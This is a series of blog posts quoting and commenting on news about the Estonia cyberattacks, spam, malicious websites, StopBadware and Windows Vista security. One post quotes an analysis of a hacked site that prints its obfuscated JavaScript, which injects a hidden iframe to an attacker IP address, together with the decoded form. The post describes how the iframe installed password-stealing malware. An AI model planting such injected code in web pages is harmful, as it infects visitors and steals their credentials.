Memex 1.1

Good piece pondering the implications of the assault on Estonia.

Even at their crudest, the assaults broke new ground. For the first time, a state faced a frontal, anonymous attack that swamped the websites of banks, ministries, newspapers and broadcasters; that hobbled Estonia’s efforts to make its case abroad. Previous bouts of cyberwarfare have been far more limited by comparison: probing another country’s internet defences, rather as a reconnaissance plane tests air defences.

At full tilt, the onslaught on Estonia was also of a sophistication not seen before, with tactics shifting as weaknesses emerged. “Particular ‘ports’ of particular mission-critical computers in, for example, the telephone exchanges were targeted. Packet ‘bombs’ of hundreds of megabytes in size would be sent first to one address, then another,” says Linnar Viik, Estonia’s top internet guru. Such efforts exceed the skills of individual activists or even organised crime; they require the co-operation of a state and a large telecoms firm, he says. The effects could have been life-threatening. The emergency number used to call ambulances and the fire service was out of action for more than an hour.

For many countries, the events of the past weeks have been a loud wake-up call. Estonia, one of the most wired nations in Europe, actually survived pretty well. Other countries would have fared worse, NATO specialists reckon…

IMHO, this is a really big deal. I can’t understand why governments appear to be paying so little attention to it. And I’m astonished that it has taken so long for an attack to materialise. Years ago I wrote that Saddam Hussein should stop wasting his efforts on WMD and hire some hackers instead. I guess he didn’t read the Observer. Just as well, maybe.

Good piece in Slate by Cyrus Farivar…

The Estonia case also shows how easy it is to cause massive panic on a shoestring budget. All you need to deploy a cyberattack is some malicious software, a bunch of zombie computers distributed around the world, and an Internet connection. Sure, you may need to pay for a “professional-grade” botnet—a network of computers that have been surreptitiously infected to run nefarious software. But surely that costs orders of magnitude less than the price of heavy artillery, battleships, and nuclear submarines.

Perhaps the most telling lesson here is how difficult it is to catch the perpetrators of online terrorism. Covering one’s fingerprints and footprints online is relatively simple, compared with getting rid of physical evidence. IP addresses can be spoofed, and an attack that appears to come from one place may actually originate somewhere else. As such, the Kremlin (or anyone else) can plausibly deny that they had anything to do with the attacks, even if the Estonians’ server logs show that the attacks first originated from Moscow. If the Russians don’t want to hand over data or documents—or even pick up the phone, for that matter—there’s not much that Estonia, or anyone else, can do to figure out the real story…

That just about sums up the latest Pew survey.

The volume of spam is growing in Americans’ personal and workplace email accounts, but email users are less bothered by it.

Spam continues to plague the internet as more Americans than ever say they are getting more spam than in the past. But while American internet users report increasing volumes of spam, they also indicate that they are less bothered by it than before. Users have become more sophisticated about dealing with spam; fully 71% of email users use filters offered by their email provider or employer to block spam. Users also report less exposure to pornographic spam, which to many people is the most offensive type of unsolicited email. Spam has not become a significant deterrent to the use of email, as some observers speculated it might when unsolicited email first began flooding users’ inboxes
several years ago. But it continues to degrade the integrity of email. Some 55% of email users say they have lost trust in email because of spam.

Full report here.

BBC NEWS | Technology | Google searches web’s dark side

One in 10 web pages scrutinised by search giant Google contained malicious code that could infect a user’s PC.

Researchers from the firm surveyed billions of sites, subjecting 4.5 million pages to “in-depth analysis”.

About 450,000 were capable of launching so-called “drive-by downloads”, sites that install malicious code, such as spyware, without a user’s knowledge.

A further 700,000 pages were thought to contain code that could compromise a user’s computer, the team report.

According to this,

A recent study by WebmasterWorld found that an estimated 77% of all blogs on Google’s Blogspot service were spam. Similarly, AOL Hometown, had well over 80% of its results turn out to be spam. Even MSN Spaces, which as not mentioned in the report, is claimed to host an estimated ten percent of spammer Web site.

It seems as if nearly every major free blog hosting service has been either overrun or nearly overrun with spam. However, one services stands alone, a relative oasis of spam cleanliness, Automattic’s Wordpress.com. Despite being just as free as its competitors and placing few restrictions on registration, Wordpress.com has not endured the spam avalanche that other services have.

Though there have been spam attacks in the past, the spammers have been easily shut down and, overall, the service remains relatively free of the splogs that seem to choke up its competitors. Though paid services such as Typepad also enjoy a relatively spam-free existance, what Wordpress.com does is very rare for a free service…

Those numbers are very interesting. Wonder how they affect the Technorati figures about 71 million blogs (as of now) and two new ones being created every second. Also: what is Google doing about the Blogspot problem?

Footnote: Memex runs on Wordpress.

Ethan Zuckerman has a fascinating story about how contemporary malware works.

It begins with him Googling a friend to find the URL of her home page, only to find that Google wouldn’t connect him to her site and flashed up the warning “This site may harm your computer”. It transpired that this is the result of the StopBadware campaign run by the folks at the Berkman Center; Google identifies sites that it believes are spreading malware and registers them with Stop Badware. If a site has been blacklisted, its owner has the option of proptesting and having his/her case reviewed by the Berkman people. Ethan duly protested on his friend’s behalf…

Within half an hour, three of my colleages pointed me to the source code of my friend’s page. At the top of her index page was a strange-looking piece of Javascript:

script language=”javascript”> document.write( unescape(
‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68
%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34
%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D
%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%22%30%22%20%77%69%64%74%68%3D%22%31%22%20
%68%65%69%67%68%74%3D%22%31%22%20%73%63%72
%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61
%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69
%66%72%61%6D%65%3E’
) );

That’s some seriously obfuscated Javascript. But if you translate from hexidecimal to ASCII, the code’s pretty clear - it inserts the following code into the top of the HTML page:

< iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter>< /iframe>

The code opens an “iframe”, an inline frame which allows another web page to be embedded within a page - iframes are pretty useful things, especially for building interactive applications in web pages. But this frame is pretty sinister. It opens a one pixel by one pixel frame which attempts to load the webpage located at http://81.95.146.98/index.html.

That page doesn’t load on my browser - the server is apparently refusing connections, at least from my Macintosh - but it occupies an IP in a block of addresses controlled by a charming bunch of guys who do business as RBusiness Network. Google for them and you’ll mostly find lots of angry message board posts from spamfighters - the RBusiness folks operate a number of servers advertised in spam emails and are suspected of relaying large amounts of spam. Many of the RBusiness- associated webpages are in Russian, though their servers are currently in Panama City, Panama - some antispammers believe that RBusiness is short for “Russian Business Network“, which was evidently their previous operating name.

Googling for the specific IP - 81.95.146.98 - turns up a couple of pages with people documenting an interesting exploit - the Microsoft Data Access Components exploit. Basically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user’s system. (Needless to say, this only happens on Microsoft Windows systems running unpatched software… which is to say, many Windows systems.) According to Ivan Macalintal, this iframe was installing code from websites that looked fairly innocuous, including one that promised to help you write your company’s travel policy. (Remarkably, this site is the #1 match for a search for “travel policy” on Google, though Google doesn’t let you click directly to the page, stopping you with a “harm your computer” message.)

It’s possible that this is what my friend’s site was trying to install - Ivan’s report dates from October 2006. It’s also possible that it was trying to install a more recent package of malware - Trojan-PSW.Win32.Small.bs - which Avira saw linked to the 81.95.126.98 domain in early January of this year. This little nasty logs passwords entered on webpages, opens a SOCKS proxy on your machine and calls home to an RBusiness server to let the bad guys know how to take advantage of your new machine to send spams and retrieve your passwords.

So had Ethan’s friend got into bed with these Russian hoodlums? Unlikely.

Simply put, [her site] was hacked. Not content with setting up websites to spread their trojan horses, the RBusiness boys have been breaking into blog and wiki sites and installing this new iframe. In some cases, they’re able to guess default passwords; in other cases, they exploit unpatched bugs in software. I was all ready to go to Berkman yesterday with my tail between my legs and tell my colleagues that my friend’s server had been compromised. But my friends were already dealing with the fact that Google had found malicious iframes on a number of Harvard-affiliated sites, including several blogs hosted on the blogs.law.harvard.edu server! Stop Badware, yesterday at least, was stopping Berkman.

Which is deeply ironic, given what the StopBadware initiative was set up to do. But in a way, it only goes to underscore how complex and dangerous our software monoculture has become.

There’s a certain predictability about this. According to John Markoff in the New York Times…

Microsoft is facing an early crisis of confidence in the quality of its Windows Vista operating system as computer security researchers and hackers have begun to find potentially serious flaws in the system that was released to corporate customers late last month.

On Dec. 15, a Russian programmer posted a description of a flaw that makes it possible to increase a user’s privileges on all of the company’s recent operating systems, including Vista. And over the weekend a Silicon Valley computer security firm said it had notified Microsoft that it had also found that flaw, as well as five other vulnerabilities, including one serious error in the software code underlying the company’s new Internet Explorer 7 browser.

The browser flaw is particularly troubling because it potentially means that Web users could become infected with malicious software simply by visiting a booby-trapped site. That would make it possible for an attacker to inject rogue software into the Vista-based computer, according to executives at Determina, a company based in Redwood City, Calif., that sells software intended to protect against operating system and other vulnerabilities…

From today’s New York Times…

The antispam industry is struggling to keep up with the surge. It is adding computer power and developing new techniques in an effort to avoid losing the battle with the most sophisticated spammers.

It wasn’t supposed to turn out this way. Three years ago, Bill Gates, Microsoft’s chairman, made an audacious prediction: the problem of junk e-mail, he said, “will be solved by 2006.” And for a time, there were signs that he was going to be proved right.

Antispam software for companies and individuals became increasingly effective, and many computer users were given hope by the federal Can-Spam Act of 2003, which required spam senders to allow recipients to opt out of receiving future messages and prescribed prison terms for violators.

According to the Federal Trade Commission, the volume of spam declined in the first eight months of last year.

But as many technology administrators will testify, the respite was short-lived.

“At the beginning of the year spam was off our radar,” said Franklin Warlick, senior messaging systems administrator at Cox Communications in Atlanta.

“Now employees are stopping us in the halls to ask us if we turned off our spam filter,” Mr. Warlick said.

Mehran Sabbaghian, a network engineer at the Sacramento Web hosting company Lanset America, said that last month a sudden Internet-wide increase in spam clogged his firm’s servers so badly that the delivery of regular e-mail to customers was delayed by hours.

To relieve the pressure, the company took the drastic step of blocking all messages from several countries in Europe, Latin America and Africa, where much of the spam was originating.

This week, Lanset America plans to start accepting incoming mail from those countries again, but Mr. Sabbaghian said the problem of junk e-mail was “now out of control.”

Antispam companies fought the scourge successfully, for a time, with a blend of three filtering strategies. Their software scanned each e-mail and looked at whom the message was coming from, what words it contained and which Web sites it linked to. The new breed of spam — call it Spam 2.0 — poses a serious challenge to each of those three approaches.

Spammers have effectively foiled the first strategy — analyzing the reputation of the sender — by conscripting vast networks of computers belonging to users who unknowingly downloaded viruses and other rogue programs. The infected computers begin sending out spam without the knowledge of their owners. Secure Computing, an antispam company in San Jose, Calif., reports that 250,000 new computers are captured and added to these spam “botnets” each day.

The sudden appearance of new sources of spam makes it more difficult for companies to rely on blacklists of known junk e-mail distributors. Also, by using other people’s computers to scatter their e-mail across the Internet, spammers vastly increase the number of messages they can send out, without having to pay for the data traffic they generate.

“Because they are stealing other people’s computers to send out the bad stuff, their marginal costs are zero,” said Daniel Drucker, a vice president at the antispam company Postini. “The scary part is that the economics are now tilted in their favor.”

The use of botnets to send spam would not matter as much if e-mail filters could still make effective use of the second spam-fighting strategy: analyzing the content of an incoming message. Traditional antispam software examines the words in a text message and, using statistical techniques, determines if the words are more likely to make up a legitimate message or a piece of spam.

The explosion of image spam this year has largely thwarted that approach. Spammers have used images in their messages for years, in most cases to offer a peek at a pornographic Web site, or to illustrate the effectiveness of their miracle drugs. But as more of their text-based messages started being blocked, spammers searched for new methods and realized that putting their words inside the image could frustrate text filtering. The use of other people’s computers to send their bandwidth-hogging e-mail made the tactic practical.

“They moved their message into our blind spot,” said Paul Judge, chief technology officer of Secure Computing…

Further to that earlier post, Jim Allchin has been, er, clarifying his remarks about Vista and anti-virus software.

During a recent discussion with journalists about the release to manufacturing for Windows Vista, I made a comment about how attacks on the Internet are getting more and more sophisticated, and some of the security features in Windows Vista really help our customers. This somehow morphed into people thinking I said customers shouldn’t use antivirus software with Windows Vista.

When the articles and blogs started appearing, I asked the PR folks to send me a copy of the transcript of the call so I could read it over and see if I said something I didn’t mean. After reading the transcript, I could certainly see that what I said wasn’t as clear as it could have been, and I’m sorry for that. However, it is also clear from the transcript that I didn’t say that users shouldn’t run antivirus software with Windows Vista! In fact, later in the call, I explicitly made this point again, because I had realized I wasn’t as clear as I should have been. It’s important for me that our customers are using the appropriate security solutions for the right situations, whether that’s security functionality integrated in the operating systems, or add-on products.

The point I had been trying to make (albeit unclearly) is that Windows Vista includes new security features that can dramatically help improve our customers’ security for certain situations. I was asked a question about how I rated the protection provided by Windows XP with Service Pack 2 and whether or not it was still effective. I ended up telling a story about how the machine my seven-year-old son uses has no antivirus software installed because it runs in a very locked down configuration, which includes only being able to visit websites on an approved list (approved through the parental controls feature in Windows Vista). He also has no access to email or instant messaging and he doesn’t run as an administrator of the machine. In fact, parental controls in Windows Vista requires that the user you apply controls to is not running as an administrator. Email, phishing, and other social engineering attacks are definitely among the most prevalent attacks that home users experience today, and his machine has been locked down in these regards.

My point in bringing up this extreme example was really meant to emphasize that importance of defense-in-depth measures we put in Windows Vista—both the number of defenses and their combined effectiveness.

Now, the comments have unfortunately been cited out of context implying that I said Windows Vista users shouldn’t use antivirus. I want to be clear, most users will use some form of antivirus software, and that will be appropriate for their scenarios. In fact, Windows Security Center, a great feature in Windows Vista, specifically encourages the use of antivirus software.

Jim Allchin, Microsoft VP, quoted on Good Morning Silicon Valley, talking about Vista.

In my opinion, it is the most secure system that’s available, and it’s certainly the most secure system that we’ve shipped. So I feel very confident that customers are far better off by using Windows Vista than they are with anything that we’ve released before.”

Earlier, he had said that he was so confident in the operating system’s security measures that he believes there’s no need for Vista users to run any third-party antivirus software.

Stay tuned.

LATER… Bill Thompson has written an insightful column about this. Excerpt:

Vista will ship with Kernel Patch Protection - also called PatchGuard - which checks to see if the core has been altered in any way. This should make it a lot harder for viruses, trojans, rootkits and other types of malicious software, or malware, to install.

PatchGuard will be backed up by support for the Trusted Platform Module, a hardware component built into many new computers that gives the operating system a way to store and use secured information.

The new approach should make life more difficult for malware writers, but it is also going to get in the way of legitimate security software vendors such as Symantec, which has already pointed out that its anti-virus programs rely on being able to modify the Windows kernel, something which will no longer be allowed.

Microsoft’s response is to argue that “kernel patching”, as the process is called, is not needed and that the standard security tools are all that are required.

It may be right, but it’s hard to tell because we don’t actually know much about what is going on inside the Vista kernel. Microsoft, like many other commercial software developers, prefers to keep such details secret.

“If severe flaws are discovered in Vista”, Bill concludes, “and there already signs that the lockdown is far from perfect, then users may well wonder why they have put their faith in the ‘benign dictator’ approach to security.”